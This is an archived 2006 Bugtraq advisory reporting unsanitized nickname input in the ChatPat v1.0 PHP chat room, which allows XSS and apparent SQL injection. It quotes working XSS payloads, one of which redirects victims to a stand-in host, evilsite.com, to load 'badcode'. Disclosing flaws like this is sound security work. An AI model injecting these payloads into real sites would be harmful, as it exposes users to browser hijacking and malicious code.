| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060523221357.9365.qmail@securityfocus.com>
Date: 23 May 2006 22:13:57 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: ChatPat v1.0
ChatPat v1.0
Homepage:
http://calendarscripts.info/download-3.html
Description:
An online chat room that lets users chat with each other.
Effected files:
fastchat.php
fastshow.php
The nickname input form doesn't sanatize user input before it adds it to the db. In turn this can cause SQL query errors such as:
UPDATE cp_users SET lastaction=NOW() WHERE nick='<BODY BACKGROUND="javascript:alert('XSS')">'
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'XSS')">'' at line 3
XSS Vuln by submitting malicious text in the chatbox:
<IMG SRC=javascript:window.location('http://www.evilsite.com/badcode')>